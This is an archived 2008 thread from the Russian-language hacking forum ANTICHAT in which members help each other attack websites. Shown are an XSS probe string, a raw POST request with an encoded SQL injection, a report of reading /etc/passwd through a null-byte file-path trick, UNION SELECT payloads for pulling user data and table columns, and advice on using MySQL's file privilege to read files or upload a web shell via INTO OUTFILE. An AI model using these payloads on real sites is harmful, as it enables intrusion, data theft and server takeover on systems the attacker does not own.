ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2008, 23:05
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
2 ZET36
там нет sql иньекции, там только раскрытие пути.
2 Велемир
попробуй
Код:
"><script>alert(/text/)</script>
|
|
|
11.04.2008, 01:52
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Нашёл инъекцию через POST :
POST /oplok.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 66
Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
Connection: Close
Pragma: no-cache
id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A
Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -
<b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />
Не может же такого быть О_О )(
Я знаю, про это где-то писали, лень мучить форум поиском:Р.
Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?
Server banner Apache/2.2.3 (CentOS)
Operating system Unix
Web server Apache 2.x
Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить)).
Ну тык, умеет кто проводить sql inj через POST запросы ? Лично я в нете шарил - не нашёл ни одного гайда по этой теме.
Последний раз редактировалось Велемир; 12.04.2008 в 04:23..
|
|
|
|
11.04.2008, 15:17
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Сообщение от Велемир
Нашёл инъекцию через POST :
POST /oplok.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.com
Content-Length: 66
Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1
Connection: Close
Pragma: no-cache
id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A
Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку -
<b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br />
Не может же такого быть О_О )(
Я знаю, про это где-то писали, лень мучить форум поиском:Р.
Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны?
Server banner Apache/2.2.3 (CentOS)
Operating system Unix
Web server Apache 2.x
Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить))
на том же сайте news.php?id=0+union+select+1,user(),3,4,5/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
12.04.2008, 12:33
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Есть таблица "user_privileges", и как можно из этой таблцы вытащить всю информацию??
|
|
|
|
12.04.2008, 14:18
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
мде..
Сообщение от GOGA075
Есть таблица "user_privileges", и как можно из этой таблцы вытащить всю информацию??
Посмотреть колумны в таблицеесли версия mysql 5,с помощью запроса:
http://site.ru/index.php?id=1+union+select+1,2,3,column_name,5,6, ....+from+information.schema.columns+where+table_n ame='user_privileges'
Потом обычным запросом ужевыдирать данные!
Но табла "user_privileges" ничем не интересна имхо!
|
|
|
|
12.04.2008, 14:22
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Но табла "user_privileges" ничем не интересна имхо!
Интересна, если нужно выяснить наличие привилегии file_priv - для чтения и записи файлов, к примеру, прочитать /etc/passwd или залить шелл через INTO OUTFILE
|
|
|
|
12.04.2008, 14:38
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
мде..
Сообщение от iddqd
Интересна, если нужно выяснить наличие привилегии file_priv - для чтения и записи файлов, к примеру, прочитать /etc/passwd или залить шелл через INTO OUTFILE
Можно просто попробывать прочитать /etc/passwd если вывод будит то ипривилегии есть,это помоемупроще чем копаться в таблице!
Хотя есть разные ситуации.. не буду спорить))
|
|
|
|
12.04.2008, 14:47
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
select file_priv from mysql.user. Кажеца так)
Можно просто попробывать прочитать /etc/passwd если вывод будит то ипривилегии есть,это помоемупроще чем копаться в таблице!
Хотя есть разные ситуации.. не буду спорить))
Не 100%-й вариант
з.ы. тупанул..ну мож кому-нить поможет  не с начала читал
Последний раз редактировалось n0ne; 12.04.2008 в 14:51..
|
|
|
|
12.04.2008, 14:47
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Да мне не именно таблицу "user_privileges" нужно прочитать, я хочузнат как ваабще их чиать над!! я просто незнаю и ещо учусь!
|
|
|
|
12.04.2008, 14:51
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
GOGA075, Не пойму вопроса, как читать из таблицы есть в мануалах по sql, советую прочитать, чтоб понимать что такое sql-inj в принципе, а не бездумно подставлять по шаблону.
А вообще конструкция такая:
select * from table where value
Где * - колонки из таблицы table, в которых существует value. Ну это один из вариантов.. |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
